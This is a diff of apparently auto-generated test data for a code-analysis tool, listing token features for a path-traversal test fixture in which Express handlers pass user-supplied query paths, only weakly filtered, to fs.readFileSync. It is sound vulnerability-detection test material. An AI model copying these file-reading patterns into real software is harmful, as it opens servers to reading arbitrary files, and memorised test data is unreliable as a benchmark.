... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:222:8:222:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:222:8:222:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:222:8:222:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:222:8:222:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:222:8:222:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:222:21:222:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:222:21:222:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:222:21:222:24 | path | calleeImports | fs | @@ -8730,6 +75251,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:222:21:222:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:222:21:222:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:222:21:222:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:225:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:225:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:225:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:225:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:225:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:225:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:233:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:233:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:233:2 | app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:233:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:233:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:1:233:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:5:225:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:5:225:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:5:225:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:225:9:225:18 | '/replace' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:225:9:225:18 | '/replace' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:225:9:225:18 | '/replace' | calleeImports | express | @@ -8737,6 +75273,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:225:9:225:18 | '/replace' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:225:9:225:18 | '/replace' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:225:9:225:18 | '/replace' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | fs | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:225:20 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | (req, r ... K\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | (req, r ... K\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | (req, r ... K\\n }\\n} | calleeImports | express | @@ -8744,11 +75295,96 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | (req, r ... K\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | (req, r ... K\\n }\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | (req, r ... K\\n }\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:21:233:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:22:225:24 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:225:27:225:29 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:225:27:225:29 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:225:27:225:29 | res | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:225:27:225:29 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:225:27:225:29 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path = ... g, ' ') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path = ... g, ' ') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path = ... g, ' ') | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path = ... g, ' ') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:7:226:70 | path = ... g, ' ') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:57 | pathMod ... replace | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:57 | pathMod ... replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:57 | pathMod ... replace | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:57 | pathMod ... replace | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:57 | pathMod ... replace | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | exceptional return of pathMod ... g, ' ') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | exceptional return of pathMod ... g, ' ') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | exceptional return of pathMod ... g, ' ') | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | exceptional return of pathMod ... g, ' ') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | exceptional return of pathMod ... g, ' ') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:25:226:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:25:226:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:25:226:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:25:226:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:25:226:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:35:226:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:226:35:226:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:226:35:226:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:226:35:226:48 | req.query.path | calleeImports | path | @@ -8758,6 +75394,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:226:35:226:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:226:35:226:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:226:35:226:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:226:39:226:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:39:226:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:39:226:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:39:226:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:39:226:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:45:226:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:45:226:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:45:226:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:45:226:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:45:226:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:226:51:226:57 | replace | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:226:51:226:57 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:226:51:226:57 | replace | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:226:51:226:57 | replace | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:226:51:226:57 | replace | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:226:59:226:64 | /%20/g | CalleeFlexibleAccessPath | pathModule.normalize().replace | | autogenerated/TaintedPath/normalizedPaths.js:226:59:226:64 | /%20/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:226:59:226:64 | /%20/g | calleeImports | path | @@ -8774,6 +75425,61 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:226:67:226:69 | ' ' | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:226:67:226:69 | ' ' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:226:67:226:69 | ' ' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:227:7:227:34 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:227:7:227:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:227:7:227:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:227:7:227:34 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:227:7:227:34 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:17 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:17 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:17 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:17 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:28 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:28 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:28 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:28 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:227:8:227:34 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:227:19:227:28 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:227:19:227:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:227:19:227:28 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query path 